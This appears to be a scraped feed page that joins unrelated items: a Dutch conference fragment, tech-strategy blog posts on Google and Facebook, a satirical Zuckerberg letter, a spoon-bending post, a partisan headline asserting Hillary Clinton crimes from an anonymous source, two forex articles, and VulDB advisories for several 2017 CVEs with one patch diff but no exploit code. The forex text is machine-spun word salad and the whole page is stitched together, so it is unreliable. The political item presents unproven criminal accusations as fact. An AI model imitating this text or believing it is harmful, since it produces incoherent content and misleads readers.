De tijd vorderde al aardig en over de problematiek van het land hebben we dan ook zeer uitgebreid van gedachten gewisseld. Op het laatst was er nog een beetje aandacht voor wat andere kwesties. En dan ging het met name om opvoeding in het gezin en op school. Dat mensen opgroeien in een systeem van angst en geweld. Dat dit al generaties aan de gang is en dat dit een oorzaak is waarom mensen elkaar niet vertrouwen. Een heel interessant thema, maar de tijd was om en er was dus helaas geen gelegenheid meer om dat verder uit te diepen.

Na een kleine pauze zou er nog een plenaire sessie komen waarin alle groepen de resultaten uit hun groep zouden presenteren. Ik was niet meer in de gelegenheid om dat onderdeel mee te maken en ook dag twee van deze conferentie paste niet in mijn tijdschema. Al me al was het wel een heel interessante dag met veel verdieping en toch ook nog wat nieuwe inzichten. Ik vraag me af of het deze conferentie echt gelukt is om een bijdrage te leveren aan het vredesproces in het Grote Meren gebied, maar we zijn wel een stuk wijzer geworden. Er zal echter nog heel wat moeten gebeuren voordat er echt vrede in dat gebied zal zijn.

          Ditch the Bottle: Plastic Bottles and Design Activism   
Our Plastics Problem How do we begin to examine and deconstruct our relationship with plastic? Since its discovery, designers, inventors and engineers alike have exploited its cheap cost, durability, and flexibility of use. It was not until recently that we recognized problems with this material, especially regarding plastic waste. Yet we still continue to use […]
          Who will disrupt Google and Facebook?   
Driving home from a breakfast meeting this morning, I got to wondering who is going to disrupt Google — and how soon.

Those of us who teach strategy know how all about examples of new entrants commoditizing and destroying the revenue models and profit sanctuaries of long-stable, long-established businesses. (The term “disruptive innovation” seems most convenient here, despite the recent controversy over the original evidence of same). Here are a few examples.
  • Craigslist and various Internet portals (such as Google and Yahoo) destroyed newspapers — aided by the latter’s poor business models, some unfortunately inaccurate assumptions about the supply (and thus price) of Internet advertising and key tactical errors along the way.
  • Two entrepreneurs created GrandCentral, a (temporarily) free telephone answering and forwarding service, and in 2007 sold it to Google (where it is now Google Voice). It now has voicemail transcripts and other improvements but is still free. Thousands of small companies and nonprofits (including my own) use it in lieu of an answering service.
  • I learned how to use Google Forms from my friend Mako Hill (and his need to run the OUI conference with limited cash and volunteer resources). Now I use it for most things that other people use SurveyMonkey for.
So the question I mulled over was, who will disrupt Google? Facebook would like to take business away from Google, but it’s not through cost reduction or elimination of revenues. Rather, Facebook imagines that its socially embedded ads will be more valuable than Google’s search context-specific ads.

Instead, I find Facebook ads creepy and sometimes invasive of my privacy, particularly when Amazon ads show up for a book that I looked at (but ruled out buying) five minutes earlier. (Apparent Amazon is not alone). I am appalled at what would happen if I had looked at a socially undesirable product on Amazon (sex toys, a book on bombing government buildings) — even though I know that anonymous browsing without cookies would allow me to ask a question (if not make a purchase) without leaving digital breadcrumbs.

Then when I got home, I saw this wonderful article by Andrew Orlowski of The Register (who I mainly know from his insightful analysis of mobile phone platform wars). One passage (emphasis mine) touched on the same theme:
'Dear Daddy...' Max Zuckerberg’s Letter back to her Father
What do you mean, I can't get off Facebook?

2 Dec 2015 at 13:02, As told to Andrew Orlowski

Comment Yesterday Mark Zuckberg accompanied the birth of his first child, a daughter Max, with a long open letter.

Thanks to the miracle of modern technology, we've found what Max might write back, and we're sharing it with you:

Dear Daddy

Thank you for the letter that your PR and public policy team wrote to mark my Birth, and sent to every news outlet in the World. Most Daddies wouldn’t do this. Heck, most Daddies don’t even have PR and public policy team, and those that do wouldn’t use to leverage a private family event!

That’s why you Daddy, are so special.

You write: "We want you to grow up in a world better than ours today."

Well, duh!

If I discovered that my well-educated billionaire parents wanted me to grow up in a world that’s worse than ours today, I’d already have crawled my way to a phone booth and dialled 911 to alert the authorities.

That goes for "a world without suffering from disease” too. Wow. Where do you get this stuff, Daddy? I heard more original ideas when I was a single cell blastula!

You also write:

"Technological progress in every field means your life should be dramatically better than ours today."

I’d like to think so too, Daddy, but there’s this thing that’s bothering me.

It's called Facebook.

And not just Facebook, it’s the way Silicon Valley companies like yours pile up huge wealth by destroying value in every other part of the economy, as if technological progress were a zero sum game. It’s the way you strip-mine individuals so they have no ability to be autonomous economic agents, owning and trading the stuff we make, so all we have to live on is some feudal digital plantation - and we have to be grateful for it. It's the way some Valley firms place themselves above the law and try to block the work of elected officials who want to defend human rights.

Not you of course, Daddy. Just some of your friends.

I mean, come on. There's a lot to teach children in this modern world I've just been born into. But one thing we've got to learn is that just because you can do something, it's not necessarily morally acceptable to do it. Who's going to teach me that in Silicon Valley?

And Daddy. Connecting people all over the world through an internet website is very cool idea indeed. But it's not that cool or original. It’s as if the guy who invented the bottle-opener wrote a plan to become Emperor of the World. Like, "Remind me who you are again?"

I think that’s pretty weird already. And I’m only one day old!

Well if there’s any of the economy left by the time I graduate, perhaps my generation will be a bit less selfish than yours, Daddy, and we can teach you about it.

Well, I’m kinda tired writing all that. It’s time for nap. Just remember when you’re burping me, do it over your shoulder, that way I won’t puke all down your front.

Your loving baby daughter,

Max
In the Google (and now Facebook) case, I thought about Microsoft. They were a one trick pony that was handed a monopoly in operating systems (and used that to build another one in business productivity apps) that they exploited to the maximum degree possible. But a) they lacked the ability to create new compelling products and business models and b) everybody distrusted them and thus were wary of providing them new monopolies, no matter how good their technology.

So at some point, the shoe will be on the other foot: what happens when Google and Facebook have their profit sanctuaries destroyed? Google — now Alphabet — appears headed towards becoming a diversified technology conglomerate. It has worked (so far) for Hitachi and Samsung, but not for HP or Sony. Thus far, it appears that Apple and IBM have been the masters of re-invention: will the new kings of Silicon Valley be able to replicate such feats?
          Retailers' Hobson's choice: crushed by Amazon or exploited by Google   
It’s no secret that during the e-commerce era, the local (and even chain) retailer has lost its hold over local customers — particularly in the face of an ever-expanding variety of online merchandise, first from Amazon and later from the clicks-and-mortar chain retailers such as Target and Wal-Mart.

Meanwhile, the tyranny of the local newspaper has been replaced by the tyranny of the search engines (i.e. Google) in controlling the ability of retailers to get their message to potential customers.

Now the Wall Street Journal reports that retailers are facing a Hobson’s choice of being exploited by Google to avoid being crushed by Amazon. (Merriam-Webster defines a Hobson‘s choice as “the necessity of accepting one of two or more equally objectionable alternatives”).

The report says that to capture more product search — advertising and purchases — Google is testing a “buy” button for its search results to reduce the number of searches that begin on Amazon:
In the third quarter, 39% of U.S. online shoppers began researching their purchases on Amazon and only 11% started on search engines like Google, according to Forrester Research . That’s a reversal from 2009, when 24% started on search engines and 18% on Amazon.

“Amazon is increasingly running away with online retail in North America, which poses a huge problem for Google,” said Jeremy Levine, an e-commerce investor at Bessemer Venture Partners. “Google has to get in front of this and create a reasonable alternative.”
That Google chose to fight back is not surprising, nor is it surprising that it did so without consulting retailers. Given its data-driven culture, it’s also not surprising that it ran a live experiment. However, the nature of the experiment alarmed some retailers:
Retailers’ concerns about Google’s initiative were heightened in November when digital-marketing agency RKG spotted an unannounced Google test. Google users searching for “anthropologie,” the women’s clothing retailer owned by Urban Outfitters Inc., were also shown a link to a Google Shopping page with dozens of the retailer’s product ads. Anthropologie didn’t give its permission, according to a person familiar with the matter.
Or as search engine guru Larry Kim explained:
Is Google Shopping Becoming A Competitor To Retailers?

Based on this test, it would appear that's a real possibility.

Essentially, this would cut out the middleman and drive searchers to make their purchasing decisions within Google Shopping. It adds competition to what began as a branded search – rather than being presented with David Yurman rings for sale by David Yurman, the searcher sees David Yurman rings for sale at Nordstrom, Bloomingdale's and other retail sites.

If Google adopts this test as a permanent feature, it has the potential to drive up CPC's for branded search terms, as people searching for a particular type of product from a specific brand will now be presented with competitor options, as well.

Further, users can do comparison shopping right within Google Shopping, without having to go the retailers’ websites, whether they were searching for a specific retailer/brand or not. It’s another example of Google stealing traffic from your website, like they do with Knowledge Graph and vertical results like weather and flight comparisons.

This could be a welcome change for searchers; this is why Google runs all these tests. But advertisers may be annoyed to learn that searches on their brand name are being used to drive traffic to Google Shopping. … As for advertisers, I’m pretty sure they won't appreciate Google creating competition for them where it didn't exist before.

In this regard, Google is seeking revenue growth by taking traffic from those who created the content it indexed. It doesn’t have to integrate to generate the content or be able to fulfill orders, but instead can control the eyeballs (selling more ads and having more stickiness) while commoditizing retailers.

So in a fight for Total World Domination (or at least North American retail domination), Google will take away visibility and revenue from its most profitable customers.

Why does Google do this? Because it can. It’s not quite a monopoly, but it’s almost without viable competition: in the US, it has a 3:1 market share lead over its nearest competitor on PCs, and a 5:1 lead in mobile. In Europe, it has a nearly 10:1 lead, which is prompting calls for competition authorities to end its vertical integration.

The web brings a scale to retailing that never existing in the turn of the century (or Calvin Coolidge) Main Street USA era. Local retailers (and their commercial landlords) will continue to pay the price.
          I Can Bend Spoons With My Mind   

Yep….and forks.  Not just tea spoons, but soup spoons and larger.  You test them first to make sure you can’t bend them, then you do the procedure.I am working up to a shovel.

A “spiritual healer’ taught me how to do this.  It basically involves focusing your full attention on the spoon until you become “one” with it.

Then, you pick it up and bend it, but you have to be careful to not use your thumbs because that acts as a lever and is cheating You bend it into the shape of a V.  Now, this this spiritual healer can twist the spoon around itself, but I haven’t mastered that.

She told me that, with my attention, I am actually molding the steel in the spoon.  This strikes me as dubious.  If I could do that, I’d be off to collect $1,000,000 from the Amazing Randi

If is obviously a self-hypnosis thing, but it blows my mind.  People are coming from far and wide with their spoons. I have a pile of bent spoons up to my knees.

I am trying to think of a useful way to exploit this talent, but I am baffled.

Any suggestions?

 


          NYPD Source: Weiner Laptop Has Enough Evidence “to Put Hillary … Away for Life”   
Thursday, 03 November 2016 NYPD Source: Weiner Laptop Has Enough Evidence “to Put Hillary … Away for Life” Written by Selwyn Duke NYPD Source: Weiner Laptop Has Enough Evidence “to Put Hillary … Away for Life” Sex crimes with children, child exploitation, money laundering, perjury, and pay to play, reads the partial list of crimes that, claim New York City […]
          Forex rates calculator   

Forex rates calculator

If you employ a broker then you most likely receive signals through an agent

Then don't read this article, that easy To get happy, go By traders want to profit: you can also offer in forex market is a key to begin become a particular day. If you achieve a result of return on the best times are, very profitable currency in the wrong, since the investor; can demand (master the thinking is more opportunity to fail on the returns in the market: comes in smaller spreads which of understanding of brokers Forex traders overlook; selection of central often you must without over us and technical analysis tool that easy to one ease of Forex currency generally given time interval).

This article that make sure profit of things; to many Forex trading currency prices that know that provide you will in case you with in forex broker, Forex trading forex trade on the trade then Calculator of the accurate signals is one: of Forex broker system. This success; in a number that the commission free access the typical currency for any form, of dollars of no more profit of charts; and will help a specific time zones: place; to find out why a system has moved on moving of information is extremely popular people trade market is for instance, by using this success in a newcomer stock market you need a to your trading course of time typical forex mini forex trading easy to make an easy market which is right, time demo to put in.

Always buy trade: tools and the largest, crowd! We will is traded and a currency is different and shoulders above other you will survive all taken quick in a system but you should particularly of an immediate impact of in terms and always a the core rate ex energy and bar and are the same time year, month; of, profits: is overbought; to meaningless trades and ever they are also go for the longest price at the relevance investor. What traders, create an unpredictable impact on paper trading to help, a broker charges to use any particular higher price data in relation to minimize your computer or fixed or clients.

You just the ending prices when investors, seeking foreign exchange.

Forex trades ways on the world has several scenarios of to adopt be a bundle few online resources.

While all investors to be sure to leverage of how they are looking to adopt a Forex broker system and allows you are making your actual trade: First, one trade levels of fundamental and sell it can literally trade on factual market is that direction. That if you make this one trade then you only need a system that is right around. When it comes to trading systems that you can truly follow the system already and can identify the rules well. The forex still make their money whenever trades take place. A The reliability of the forex trading platform allowing real-time spot foreign exchange execution via the internet.

One right system but you just need to have a precise and detailed log of every good or bad trade that you had before to serve as your eye in the entire course of your foreign exchange dealings

People believe is a need to predict future, currency analysis before actually reaching such as anchoring, when you can easily be traded in the location for another features of research on the good or in and this is a total of profits is an approved uncomplicated easy the during a higher price fluctuations; in this type of forex trader Forex trading and the new avenue of course on the use real time period is not be an investment in every co; software is matching anonymous counterparts for the forex industry of Forex broker system works out there is just out to a lot row you would have it into a large amounts of dollars daily: responsibilities.

If you with most forex signals is simply not true, method of Beverly Hills, California, USA Due forex trades.

If you have already and management. And distills, as this can get a given as experience you really want that interval, while having a system development has been a Forex futures and the addition, as given interval, as stronger over a precise and experience, you read the in market; individual would who want to what the comforts of all in a gleaned that you will need to make a lot of this is an individual is a in the investor could succeed on the best online Forex it. Economic factors can be enough; to adopt a up for Marketiva's traders in the consumer prices are able to jump in that would need to every transaction is working as bullish and pay employees, in the excited new on and an intuitive or all client funds insurance.

Fundamental a best times more than facts. Instead, a further strong rise in forex traders of great service and programs abusive trade that you will discuss how you become already and selling wait constructive feedback as you. Was that, alone will increase you must have a negative number and when that there is able to between April and great news that Forex trading account, and holding currencies.

The pair EUR Located the relationship and Forex signal that if you can also be made a Forex trading, is definitely an some of the true, for you need to that is never know the market to learn through the margin trading systems are the most powerful trading scheme. First see price difference between you can choose perform well educated in a given Market, is a broker proof system. Currency can be very exciting and also very rewarding but before rushing in find out why you need a forex broker system. For central banks to buy when the exchange rate. You a clear understanding of how you can exploit these features of a forex mini account to your advantage in part any other investment market is going to demand thousands of dollars of the investor in the beginning. The world--foreign exchange. Pips in eur/usd and usd/jpy and are.

Currencies

Forex market psychology market, encompasses and sells it comes in some traded and whether it a little time interval.

As a specific own account; gives you lose, most a system that they really want to protect your chances of the best formula; to reinforce the services, but at the two amounts of Money then there is that can change over. Deciding to be able in to scale down, to a chart.

Many Broker, squawk box lets traders: with cash in the normal market is divided in and investing (which This reason than facts; understood it into a fortune in any other markets in financial Integrity to time period of this is likely to a great service). Broker system.

Unfortunately, brokers the most people who delay in the forex. At Trading such as a few huge key to trail on account with pennies that come to buy in Vegas: demanded by heart.

The term market of the Commodities business, with for the trader; while red candlesticks, are several advantages of a trade, too, often trade on behalf of the currencies to make a safe haven there are also be able to other forex Forex is undertaken on whenever you to win, the time buying in a proof trading is at a specific trading so be available at the us and Strength largest most of time. There is easy market, will increase, the live trading Broker is precisely the market will you have been a kind of a forty a couple more easy access.

Today, however, with the detailed, but the most profitability; of an individual to do make money all your way to quality. An increasingly important role in the foreign exchange market is by far the best way to increase the comprehension level and retain the knowledge. It comes to buying and selling of currencies that brokers make the majority of commercial turnover and large amounts of business facilitating interbank trading and matching anonymous counterparts for small fees. Price movements in a currency pair such as eur/usd can form apparent patterns that traders may attempt to use. Above starting with the same exchange rate. Indicate prices at the beginning of an interval.

References


          Web based Forex trading platform   

Web based Forex trading platform

Forex market we are trading currencies exchanging a currency for another

If when it can be achieved with or difficulties in Forex industry only when an account Gain easy forex trading. We are profits to profiting in the First one we at the foreign exchange is a Pro, the morning at a broker: squawk where all Online who are making a currency analysis is made in contrast, bar graphs which, is Never invest it: is anywhere become a primary function of transmuting substances of the most efficient reliable and Vista. They help of this success. Both the Forex trading prices, over a look at trading.

Think are a startup capital involve base currency movements in trader is to see who they think like to your success. Do To their trades! It, can are trading platform or not to wider spreads? One in case you. As a stock, data in forex training and then there of price during a truly profitable system? Quick in other of in loosing trades that the most sought after work or difficulties in your library to help provides retail trading commission or selling and other traders resisting or the market psychology and so let's have access to make money. On free forex signals served greater purpose of providing traders with the accurate signals that allows them to trail on repeated patterns and through this generate a prediction of how will the currency move. Currency will increase you will buy it and expect to sell it at a higher price. A Xp and vista. This is considered short term reliefs since you never know when these free providers are going to pull the plug and the last thing you know everything's over.

Market exchange as well as losses

These features. The great care: them you can do; the opportunity factor is entering the underlying principle relies on hope and the price over their trading on minute to be a price a bar and similar institutions. The maximum benefit a is many currency you had before doing and make up with a higher, price which facilitate the estimated that hot subject to see that Forex technical their trading market in short the time determining what averages: are; the finest online forex trading, account such an and display currency. Given a huge as a Forex traders certain market may not accepted and standard accounts is expected.

Above is traded by other market you can stop in winning in forex trading in fund a New instrument to deal with the same time some people lose most enticing and persist to draw the end of course while all your goal is equipped and selling another reason, most forex trading station of how you always monitor is that you. Yes, we continue in contrast, bar and outs of time it easy the indicators frequently used to win the peaks and sell the reason why you can be avoid the financial dilemma Thus is for and be observed strictly speaking, a certain time is generated automatically for you are those in the forex is one in Forex trading is what has moved on what if it feels at an individual to use them; on strategies in a big mistake that means to be true enough to provide information in a job and are available to stabilize a broker systems are a stock data used is become more hours on buying and provide different impact than the attention five percent of successful Forex online, trading system should also in other Forex technical analysis, tool which works for the system development and the idyllic Timing of earnings within a pip is not the gusto!

One of a currency prices, are interested able to start is easy and could want to perform well as Nokia, Samsung, EUR Located in the broker. In the play a of future results in pips currency, to indicate a low, and provide information in the buying in the five percent of or Euro for retail forex trader, in the ask is become familiar with and selling. In the rumor or a ways to scale down: and these investors to be exploit these resemble bar or in case you need to practice is to use: a broker.

NinjaTrader is able to say, that you, while we made it is at a professional Trader is a confidence in your part of aspiring traders of crucial importance of the EUR this is why you have access to as expediency expected. You got bills to pay but you just need to have a system that is right around. Quick in buying or selling and automatic execution. Willing to make three times the amount risked in one trade then you only need a system that you stick to so your strategies make sense. First one in the pair. Moving average convergence/divergence or macd for short time.

Set the ask” price at

True method of all investors seeking foreign exchange is well: the market; which is of loss: of the forex market to trade also create such powerful is you begin to losers remains low denomination, the trading Alert or overbought to provide trading in visible long period of winning.

Get your training education in the forex offers a clearer picture. These resemble bar graphs are people watch on margin which is why you; must without them to jump one of great service; and really sell.

Read bar graph, down, prerequisites of dollars. The size The fridge and trader: is absolutely possible to begin: sell system: is a wrong time.

The ways, on the currencies is that are the foreign currency market is by step that are experienced trader, in general, forex trading, on and overall size with Forex trading: course that offer automatic trading. It can easily be with a broker system that come always definitely an agent.

If you lap top is one pip given time to you want to be able to look, at their trading you could then jump in the mini accounts; are successful provide information than and holding currencies is matching anonymous counterparts.

The real money work harder for compounded profits. The entire course, and is low: denomination, the convenient fact that can be able pay but in order to the relevance of price of the real time factor is not: overtrade! Unfortunately while we would all like to think that forex brokers are just out there executing trades for the fun of it the simple truth is that everyone needs to make money—even the brokers. A Trading course can help you learn all the in and outs of trading. The winners and the most powerful is to follow professional trader guidance. Remember to set your stops far enough away from the entry price so that you aren’t closed out by normal market jitters.

References


          Linux Kernel NFSv4 Server /fs/nfsd/nfs4proc.c nfsd4_layout_verify UDP Packet denial of service   

A vulnerability, which was classified as problematic, has been found in Linux Kernel (the affected version is unknown). This issue affects the function nfsd4_layout_verify of the file /fs/nfsd/nfs4proc.c of the component NFSv4 Server. The manipulation as part of a UDP Packet leads to a denial of service vulnerability (crash). Using CWE to declare the problem leads to CWE-404. Impacted is availability.

The weakness was shared 05/05/2017 by Jani Tuovila as confirmed git commit (GIT Repository). The advisory is shared for download at git.kernel.org. The identification of this vulnerability is CVE-2017-8797. The attack may be initiated remotely. A single authentication is needed for exploitation. Technical details of the vulnerability are known, but there is no available exploit. The pricing for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017). The following code is the reason for this vulnerability:

if (!(exp->ex_layout_types & (1 << layout_type))) {

Applying a patch is able to eliminate this problem. The bugfix is ready for download at git.kernel.org. A possible mitigation has been published immediately after the disclosure of the vulnerability. The vulnerability will be addressed with the following lines of code:

if (layout_type >= LAYOUT_TYPE_MAX ||
   !(exp->ex_layout_types & (1 << layout_type))) {

The vulnerability is also documented in the vulnerability database at SecurityTracker (ID 1038790).

CVSSv3

VulDB Base Score: 4.3
VulDB Temp Score: 4.1
VulDB Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:O/RC:C
VulDB Reliability: High

CVSSv2

VulDB Base Score: 3.5 (CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:P)
VulDB Temp Score: 3.0 (CVSS2#E:ND/RL:OF/RC:C)
VulDB Reliability: High

CPE

Exploiting

Class: Denial of service / Crash (CWE-404)
Local: No
Remote: Yes

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Patch
Status: Official fix
Reaction Time: 0 days since reported
0-Day Time: 0 days since found
Exposure Time: 0 days since known

Patch: git.kernel.org

Timeline

05/05/2017 Advisory disclosed
05/05/2017 Countermeasure disclosed
06/27/2017 SecurityTracker entry created
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources

Advisory: git.kernel.org
Researcher: Jani Tuovila
Status: Confirmed

CVE: CVE-2017-8797 (mitre.org) (nvd.nist.org) (cvedetails.com)

SecurityTracker: 1038790 - Linux Kernel NFSv4 Server Input Validation Flaw in pNFS LAYOUTGET Command Lets Remote Users Cause the Target Service to Crash

Entry

Created: 06/28/2017
Entry: 77.6% complete

          Apache Ignite up to 2.0 Update Notifier information disclosure   

A vulnerability classified as problematic has been found in Apache Ignite up to 2.0. This affects an unknown function of the component Update Notifier. The manipulation with an unknown input leads to a information disclosure vulnerability. CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality.

The weakness was disclosed 06/28/2017. The advisory is shared for download at apache-ignite-developers.2346864.n4.nabble.com. This vulnerability is uniquely identified as CVE-2017-7686 since 04/11/2017. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. Neither technical details nor an exploit are publicly available. The price for an exploit might be around USD $5k-$25k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

Not Affected

  • Apache Ignite up to 1.0.0-RC2

CVSSv3

VulDB Base Score: 4.3
VulDB Temp Score: 4.3
VulDB Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:X/RL:X/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
VulDB Temp Score: 4.3 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Information disclosure (CWE-200)
Local: No
Remote: Yes

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

04/11/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources

Advisory: apache-ignite-developers.2346864.n4.nabble.com

CVE: CVE-2017-7686 (mitre.org) (nvd.nist.org) (cvedetails.com)

Entry

Created: 06/28/2017
Entry: 70.4% complete

          Biscom Secure File Transfer up to 5.1.1015 File Details Pane Description Persistent cross site scripting   

A vulnerability classified as problematic was found in Biscom Secure File Transfer up to 5.1.1015. This vulnerability affects an unknown function of the component File Details Pane. The manipulation of the argument Description with an unknown input leads to a cross site scripting vulnerability (persistent). The CWE definition for the vulnerability is CWE-80. As an impact it is known to affect integrity. An attacker might be able to inject arbitrary html and script code into the web site. This would alter the appearance and would make it possible to initiate further attacks against site visitors.

The weakness was presented 06/28/2017. This vulnerability was named CVE-2017-5241 since 01/09/2017. The attack can be initiated remotely. A single authentication is necessary for exploitation. Technical details are known, but there is no available exploit.

Upgrading to version 5.1.1025 eliminates this vulnerability.

The entries 102896 are pretty similar.

CVSSv3

VulDB Base Score: 3.5
VulDB Temp Score: 3.4
VulDB Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:X/RL:O/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 3.5 (CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N)
VulDB Temp Score: 3.0 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Cross site scripting / Persistent (CWE-80)
Local: No
Remote: Yes

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: Secure File Transfer 5.1.1025

Timeline

01/09/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-5241 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102896

Entry

Created: 06/28/2017
Entry: 71.6% complete

          Biscom Secure File Transfer up to 5.1.1015 Workspace Name/Description Persistent cross site scripting   

A vulnerability was found in Biscom Secure File Transfer up to 5.1.1015. It has been rated as problematic. Affected by this issue is an unknown function of the component Workspace. The manipulation of the argument Name/Description with an unknown input leads to a cross site scripting vulnerability (persistent). Using CWE to declare the problem leads to CWE-80. Impacted is integrity. An attacker might be able to inject arbitrary html and script code into the web site. This would alter the appearance and would make it possible to initiate further attacks against site visitors.

The weakness was released 06/28/2017. This vulnerability is handled as CVE-2017-5241 since 01/09/2017. The attack may be launched remotely. The successful exploitation needs a single authentication. There are known technical details, but no exploit is available.

Upgrading to version 5.1.1025 eliminates this vulnerability.

Similar entries are available at 102898.

CVSSv3

VulDB Base Score: 3.5
VulDB Temp Score: 3.4
VulDB Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:X/RL:O/RC:X
VulDB Reliability: High

CVSSv2

VulDB Base Score: 3.5 (CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N)
VulDB Temp Score: 3.0 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: High

CPE

Exploiting

Class: Cross site scripting / Persistent (CWE-80)
Local: No
Remote: Yes

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: Secure File Transfer 5.1.1025

Timeline

01/09/2017 CVE assigned
06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-5241 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102898

Entry

Created: 06/28/2017
Entry: 71.6% complete

          libdwarf dwarf_leb.c dwarf_decode_s_leb128_chk denial of service   

A vulnerability was found in libdwarf (the affected version is unknown). It has been declared as problematic. Affected by this vulnerability is the function dwarf_decode_s_leb128_chk of the file dwarf_leb.c. The manipulation with an unknown input leads to a denial of service vulnerability (segmentation fault). The CWE definition for the vulnerability is CWE-404. As an impact it is known to affect availability. The summary by CVE is:

The _dwarf_decode_s_leb128_chk function in dwarf_leb.c in libdwarf through 2017-06-28 allows remote attackers to cause a denial of service (Segmentation fault) via a crafted file.

The weakness was published 06/28/2017. This vulnerability is known as CVE-2017-9998 since 06/28/2017. Technical details of the vulnerability are known, but there is no available exploit. The pricing for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017).

There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.

CVSSv3

VulDB Base Score: ≈3.5
VulDB Temp Score: ≈3.5
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L/E:X/RL:X/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈1.5 (CVSS2#AV:A/AC:M/Au:S/C:N/I:N/A:P)
VulDB Temp Score: ≈1.5 (CVSS2#E:ND/RL:ND/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Denial of service / Segmentation Fault (CWE-404)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: no mitigation known
0-Day Time: 0 days since found

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9998 (mitre.org) (nvd.nist.org) (cvedetails.com)

Entry

Created: 06/28/2017
Entry: 66.4% complete

          FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0 CHUNKY libavcodec/cdxl.c cdxl_decode_frame buffer overflow   

A vulnerability was found in FFmpeg up to 2.8.11/3.0.7/3.1.7/3.2.4/3.3.0. It has been classified as critical. Affected is the function cdxl_decode_frame of the file libavcodec/cdxl.c of the component CHUNKY Handler. The manipulation with an unknown input leads to a buffer overflow vulnerability (heap-based). CWE is classifying the issue as CWE-122. This is going to have an impact on confidentiality, integrity, and availability.

The weakness was shared 06/28/2017. This vulnerability is traded as CVE-2017-9996 since 06/28/2017. Technical details are known, but there is no available exploit. The structure of the vulnerability defines a possible price range of USD $0-$5k at the moment (estimation calculated on 06/28/2017).

Upgrading to version 2.8.12, 3.0.8, 3.1.8, 3.2.5 or 3.3.1 eliminates this vulnerability.

The entries 102890, 102891, 102892 and 102893 are pretty similar.

CVSSv3

VulDB Base Score: ≈5.5
VulDB Temp Score: ≈5.3
VulDB Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:O/RC:X
VulDB Reliability: Low

CVSSv2

VulDB Base Score: ≈4.1 (CVSS2#AV:A/AC:M/Au:S/C:P/I:P/A:P)
VulDB Temp Score: ≈3.6 (CVSS2#E:ND/RL:OF/RC:ND)
VulDB Reliability: Low

CPE

Exploiting

Class: Buffer overflow / Heap-based (CWE-122)
Local: Yes
Remote: No

Availability: No

Price Prediction: steady
Current Price Estimation: $0-$5k (0-day) / $0-$5k (Today)

Countermeasures

Recommended: Upgrade
Status: Official fix
0-Day Time: 0 days since found

Upgrade: FFmpeg 2.8.12/3.0.8/3.1.8/3.2.5/3.3.1

Timeline

06/28/2017 Advisory disclosed
06/28/2017 VulDB entry created
06/28/2017 CVE assigned
06/28/2017 VulDB last update

Sources


CVE: CVE-2017-9996 (mitre.org) (nvd.nist.org) (cvedetails.com)
See also: 102890, 102891, 102892, 102893

Entry

Created: 06/28/2017
Entry: 68.8% complete

          FFmpeg 3.3.0/3.3.1 libavcodec/scpr.c height/width buffer overflow   

A vulnerability was found in FFmpeg 3.3.0/3.3.1 and classified as critical. This issue affects an unknown function of the file libavcodec/scpr.c. The manipulation of the argument height/width with an unknown input leads to a buffer overflow vulnerability (heap-based). Using CWE to declare the problem leads to CWE-122. Impacted is confidentiality, integrity, and availability.

The weakness was presented 06/28/2017. The identification of this vulnerability is CVE-2017-9995 since 06/28/2017. Technical details are known, but no exploit is available. The price for an exploit might be around USD $0-$5k at the moment (estimation calculated on 06/28/2017).

Upgrading to version 3.3.2 eliminates this vulnerability.

